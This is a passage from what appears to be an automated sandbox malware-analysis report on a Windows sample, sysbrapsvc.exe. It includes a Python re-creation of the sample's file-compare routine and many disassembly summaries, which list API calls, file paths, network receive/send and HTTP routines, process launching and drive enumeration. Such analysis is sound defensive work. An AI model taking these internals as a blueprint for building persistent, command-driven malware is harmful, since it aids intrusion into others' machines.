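    the dump: open read-only, map PAGE_READONLY, view FILE_MAP_READ, GetFileSize,
    memcmp, UnmapViewOfFile, CloseHandle x2.
    """
    try:
        fd = os.open(path, os.O_RDONLY)          # CreateFileW(GENERIC_READ, OPEN_EXISTING)
    except OSError:
        return None
    try:
        size = os.fstat(fd).st_size              # GetFileSize
        if size != len(expected):
            return False
        if size == 0:                            # zero-length files cannot be mapped
            return True
        with mmap.mmap(fd, 0, access=mmap.ACCESS_READ) as view:   # CreateFileMappingW + MapViewOfFile
            return view[:size] == expected       # memcmp
    finally:
        os.close(fd)                             # CloseHandle


def sync_file(path: str, expected: bytes) -> bool:
    """Rewrite `path` with `expected` unless it already holds exactly those bytes.

    The write path matches CreateFileW(GENERIC_WRITE, CREATE_ALWAYS) + WriteFile +
    CloseHandle at 0x40edd0-0x40ee12. Returns True when a write happened.
    Assumption: the example lets the compare result drive the write decision; in
    the sample the branch at 0x40edca may instead depend on state set by the
    helper at 0x40a660, which the dump does not show.
    """
    if file_matches(path, expected) is True:
        return False
    with open(path, "wb") as fh:                 # CREATE_ALWAYS: create or truncate
        fh.write(expected)                       # WriteFile
    return True


def demo() -> List[Optional[bool]]:
    """Exercise both functions on a constructed file in a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "probe.bin")         # hypothetical file name
        return [
            file_matches(p, b"abc"),   # None: file does not exist yet
            sync_file(p, b"abc"),      # True: written
            file_matches(p, b"abc"),   # True: identical
            sync_file(p, b"abc"),      # False: no rewrite needed
            sync_file(p, b"abcd"),     # True: content differs, rewritten
            file_matches(p, b"abc"),   # False: size differs now
        ]


if __name__ == "__main__":
    print(demo())
```

The size check before the map is what GetFileSize at 0040ECFB gives the sample for free: a length mismatch rules out equality without touching the mapping, and a zero-length file is handled separately because neither CreateFileMappingW nor Python's mmap will map an empty file.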

                                                                                Control-flow Graph
                                                                                (graph image not reproduced; basic blocks 40d780-40d8b0, no internal calls)
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D786
                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,02260638,000000FF), ref: 0040D78D
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D798
                                                                                • SetThreadPriority.KERNELBASE(00000000,?,?,?,00407F75,02260638,000000FF), ref: 0040D79F
                                                                                • InterlockedExchangeAdd.KERNEL32(00407F75,00000000), ref: 0040D7C2
                                                                                • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D7F7
                                                                                • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D842
                                                                                • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D85E
                                                                                • Sleep.KERNELBASE(00000001), ref: 0040D88E
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D89D
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75), ref: 0040D8A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 3862671961-0
                                                                                • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction ID: 6fb5641eb3e61aabfeb8d94b6f23565c140e371fca94fd76c4ad34d85bd1d77f
                                                                                • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction Fuzzy Hash: 32414C75E00209EBCB04EFE4D848BAEBB71EF44305F10C16AE916A7384D6789A85CF55

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041AE68,?,?,?,?,?,?,00407EF9), ref: 0040B77B
                                                                                • CreateFileW.KERNELBASE(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B822
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B888
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B892
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B89C
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Strings
                                                                                • C:\Users\user\tbtnds.dat, xrefs: 0040B7C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                • String ID: C:\Users\user\tbtnds.dat
                                                                                • API String ID: 439099756-4031448526
                                                                                • Opcode ID: 7522d26a6701077299d235e5744c4266a6018d639c07455c855527bb792da273
                                                                                • Instruction ID: 479a2d3db74d12cc9ab5db8b9028aebaa0e2ca82416c5c7c2c0831f1d1863687
                                                                                • Opcode Fuzzy Hash: 7522d26a6701077299d235e5744c4266a6018d639c07455c855527bb792da273
                                                                                • Instruction Fuzzy Hash: FB417C75E40309ABDB10EFA4CC4ABAEB774EB44704F20842AFA11B72D1C7B96541CB9D

                                                                                Control-flow Graph
                                                                                (graph image not reproduced; basic blocks 405b60-405c88, internal calls to 405c90, 40a660, 40ccd0)
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041A400,?,?,?,?,?,00407EC3), ref: 00405B6B
                                                                                • CreateFileW.KERNELBASE(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407EC3), ref: 00405B85
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                                Strings
                                                                                • C:\Users\user\tbtcmds.dat, xrefs: 00405B80
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                • String ID: C:\Users\user\tbtcmds.dat
                                                                                • API String ID: 3956458805-3965455335
                                                                                • Opcode ID: 4497637cd0b756bf78cd114f633b1d148b8706e28ae781032a38565040356a71
                                                                                • Instruction ID: 34cf97d68150feb52ab64e4c1d62c08212747bf40ca63f75f299d91bb9f0c47d
                                                                                • Opcode Fuzzy Hash: 4497637cd0b756bf78cd114f633b1d148b8706e28ae781032a38565040356a71
                                                                                • Instruction Fuzzy Hash: 5D313A74A40308EBEB10DBA4CD4ABAFB770EB44704F208529E601772D0D7B96A81CF99

                                                                                Control-flow Graph
                                                                                (graph image not reproduced; basic blocks 40ee30-40eedb, no internal calls)
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040EE3E
                                                                                • memset.NTDLL ref: 0040EE4E
                                                                                • CreateProcessW.KERNELBASE(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EE87
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EE97
                                                                                • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EEB2
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EECC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction ID: ab95b539b52ee8c861e7b35bb7843e11e17158efae48c82db73052011d4181fd
                                                                                • Opcode Fuzzy Hash: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction Fuzzy Hash: F2113071A4430CBAEB10DB90DD46FDE7764AB14B00F104125FA057E2C0D6F5AA548759

                                                                                Control-flow Graph
                                                                                (graph image not reproduced; basic blocks 40dd40-40de2d, internal call to 40cd50)
                                                                                APIs
                                                                                • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                • Sleep.KERNELBASE(000003E8), ref: 0040DD9E
                                                                                • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                • StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleeprecvfrom
                                                                                • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                • API String ID: 668330359-3973262388
                                                                                • Opcode ID: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction ID: 7b96b2f8d6d36e055c6c7570a615b3eea8bd5cb55d36e980e60cabbeadb8daeb
                                                                                • Opcode Fuzzy Hash: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction Fuzzy Hash: 78216FB5940218ABDB20DB64DC49BE97774AF04308F1085E9E709BB2D0D6B95AC6CF9C

                                                                                Control-flow Graph (graph rendering omitted): basic blocks 40eee0-40ef89; calls InternetOpenA, InternetOpenUrlA, HttpQueryInfoA, InternetCloseHandle and Sleep
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EF16
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF68
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF72
                                                                                • Sleep.KERNELBASE(000003E8), ref: 0040EF7D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EEF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-2272513262
                                                                                • Opcode ID: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction ID: 09246262baac8142bf73057cdf9805b9640511cbdee0a0d8a20d2e1b7007a2ac
                                                                                • Opcode Fuzzy Hash: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction Fuzzy Hash: 6A210A75A40309FBDB10DFA4CC49FEEB775AB08705F1085A9FA11AB2C0C7B96A44CB59
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B0C8
                                                                                • WriteFile.KERNELBASE(000000FF,00000000,?,?,00000000), ref: 0040B0E9
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B0F3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B0FD
                                                                                • InterlockedExchange.KERNEL32(00419828,0000003D), ref: 0040B10A
                                                                                Strings
                                                                                • C:\Users\user\tbtnds.dat, xrefs: 0040B0C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                • String ID: C:\Users\user\tbtnds.dat
                                                                                • API String ID: 442028454-4031448526
                                                                                • Opcode ID: 1e9444d5750d37bbbcc857e4368f663b0b7ba3596edf0d01e927ecec2ec7da89
                                                                                • Instruction ID: 65abf3b26d1f33ce57344cf3d4c90c2ddc2d392c326f45743aae56010b0155a0
                                                                                • Opcode Fuzzy Hash: 1e9444d5750d37bbbcc857e4368f663b0b7ba3596edf0d01e927ecec2ec7da89
                                                                                • Instruction Fuzzy Hash: D33149B8A40208EBCB14DF94EC45FAEB7B1FB48300F208569E511A7391D775AA51CB9A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1447977647-3252725368
                                                                                • Opcode ID: 51ae6eda0d425cdf9ddaf6c3c8cff51808a0295876ba3643fa7b81f5b4b7d6d9
                                                                                • Instruction ID: 9050299abbe0a346d3081233791c3133021d614aeebffb5e53434d9287984c88
                                                                                • Opcode Fuzzy Hash: 51ae6eda0d425cdf9ddaf6c3c8cff51808a0295876ba3643fa7b81f5b4b7d6d9
                                                                                • Instruction Fuzzy Hash: 30310DB4C00218DFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF5A
                                                                                APIs
                                                                                • GetLogicalDrives.KERNELBASE ref: 00406346
                                                                                • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                Strings
                                                                                • NoDrives, xrefs: 004063B8
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                • API String ID: 2666887985-3471754645
                                                                                • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                                • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D700: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D740
                                                                                  • Part of subcall function 0040D700: CloseHandle.KERNEL32(?), ref: 0040D759
                                                                                • CreateThread.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2251373460-0
                                                                                • Opcode ID: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction ID: f472e5e68ab63b0dd33345cd9092821366bebf82f5afbdb011aebb5a24a45ce9
                                                                                • Opcode Fuzzy Hash: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction Fuzzy Hash: 5D310A74A00208EFDB04DF98D889B9EBBB5FF49308F0085A9E905A7390D775EA95CF54
                                                                                APIs
                                                                                • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                • htons.WS2_32(?), ref: 00401281
                                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                • String ID: pdu
                                                                                • API String ID: 2164660128-2320407122
                                                                                • Opcode ID: 4f2e69fc86119e98b8d82d5b4d5fedd48789e739a052b8fc27d84ba777224162
                                                                                • Instruction ID: 1b6d4435c5f8e1f149c0fb86e6a0c1a3006a9f031597685944d6c13f048a50c8
                                                                                • Opcode Fuzzy Hash: 4f2e69fc86119e98b8d82d5b4d5fedd48789e739a052b8fc27d84ba777224162
                                                                                • Instruction Fuzzy Hash: E931B2362083009BC710DF69D884A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,00407ECD), ref: 00406F78
                                                                                • SysAllocString.OLEAUT32(C:\Windows\sysbrapsvc.exe), ref: 00406F83
                                                                                • CoUninitialize.OLE32 ref: 00406FA8
                                                                                  • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                                                                Strings
                                                                                • C:\Windows\sysbrapsvc.exe, xrefs: 00406F7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$AllocInitializeUninitialize
                                                                                • String ID: C:\Windows\sysbrapsvc.exe
                                                                                • API String ID: 459949847-94466369
                                                                                • Opcode ID: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction ID: c509d36c12d7ba2a5f650eb278e956dc9bc0801d495f3ab7a1e1adcf34b7a620
                                                                                • Opcode Fuzzy Hash: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction Fuzzy Hash: 57E0DFB4941308FBCB00EBE0EE0EB8D7738EB04315F004078F90267291DABA9E90CB19
                                                                                APIs
                                                                                • GetDriveTypeW.KERNELBASE(0040629F), ref: 004062CD
                                                                                • QueryDosDeviceW.KERNELBASE(0040629F,?,00000208), ref: 0040630C
                                                                                • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 00406324
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeviceDriveQueryType
                                                                                • String ID: \??\
                                                                                • API String ID: 1681518211-3047946824
                                                                                • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                                • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                                APIs
                                                                                • ioctlsocket.WS2_32 ref: 0040112B
                                                                                • recvfrom.WS2_32 ref: 0040119C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                • String ID:
                                                                                • API String ID: 3980219359-0
                                                                                • Opcode ID: 040756bc7d30765698bbdbc2b7edff8924aad6f67f943ab09c6075d22f1106d0
